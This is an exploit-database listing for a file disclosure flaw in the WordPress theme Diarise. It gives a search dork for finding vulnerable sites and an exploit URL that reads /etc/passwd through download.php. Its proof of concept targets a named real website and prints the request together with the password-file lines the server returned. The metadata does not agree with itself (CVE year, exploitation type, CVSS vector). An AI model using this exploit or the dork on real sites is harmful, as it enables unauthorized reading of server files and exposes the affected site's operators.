Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-23456 | CWE-98 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Local | 2019-05-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N | 0.02192 | 0.50148 |
[+] Local File Disclosure in wordpress theme Diarise [+] Date: 07/05/2019 [+] CWE Number: CWE-98 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Dork: inurl:"wp-content/themes/diarise/" [+] Vendor Homepage: https://woocommerce.com/?aff=1790 [+] Contact: [email protected] [+] Tested on: Windows 7 and Linux [+] Vulnerable File: download.php [+] Exploit : http://domain.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ] [+] PoC: http://tringanglers.org.uk/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd [+] Example: GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1 Host: tringanglers.org.uk User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 root:x:0:0:root:/root:/bin/false tringanglers.org.uk:x:987900:987900:tringanglers.org.uk:/home/tringanglers.org.uk:/bin/false eof
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.